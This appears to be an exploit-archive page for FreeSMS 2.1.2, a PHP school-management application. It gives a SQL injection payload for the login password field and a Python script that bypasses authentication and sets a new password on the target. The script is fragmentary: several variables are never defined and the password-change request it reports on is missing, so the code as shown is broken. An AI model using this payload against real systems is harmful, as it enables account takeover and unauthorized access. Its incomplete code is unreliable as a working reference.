Exploits / Vulnerability Discovered : 2019-04-04 |
Type : webapps |
Platform : php
This exploit / vulnerability Freesms 2.1.2 sql injection (authentication bypass) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: FreeSMS 2.1.2 - Authentication Bypass
# Date: 2019-04-03
# Exploit Author: Yilmaz Degirmenci
# Vendor Homepage: https://freesms.sourceforge.io/
# Software Link: https://sourceforge.net/projects/freesms/
# Version: v2.1.2
# Category: Webapps
# Tested on: LAMPP for Linux
# Software Description : FreeSMS is a PHP based application to manage an educational facility
# of teachers and students alike. It is a teacher and student management system providing marketing,
# registration, course management, attendance and a student evaluation system.
# ==================================================================
# The "password" parameter has boolean-based blind SQL injection vulnerability.
# The login panel can be bypassed if the user name is known.
# SQLDork: pass") RLIKE (SELECT (CASE WHEN (4404=4404) THEN 0x61646d696e74 ELSE 0x28 END)) AND ("WpaN"="WpaN
# Exploit allows the creation of a new password on the target.
data = {"username": ""+uname+"", "password": "pass\") RLIKE (SELECT (CASE WHEN (4404=4404) THEN 0x61646d696e74 ELSE 0x28 END)) AND (\"WpaN\"=\"WpaN", "context": "ou=Don Mills,ou=Toronto,ou=Ontario,ou=Canada,o=CRC World", "login": "login"}
bp = bypass = requests.post(url, headers=headers, data=data)
if bp.status_code == 200:
print "Authentication bypass was successful!"
print "Trying to change password..."
else:
print "Something went wrong. You should try manual exploitation"
sys.exit()
if p.status_code == 200:
print "New password successfully created! New Password: "+npass+""
else:
print "Something went wrong. You should try manual exploitation"
sys.exit()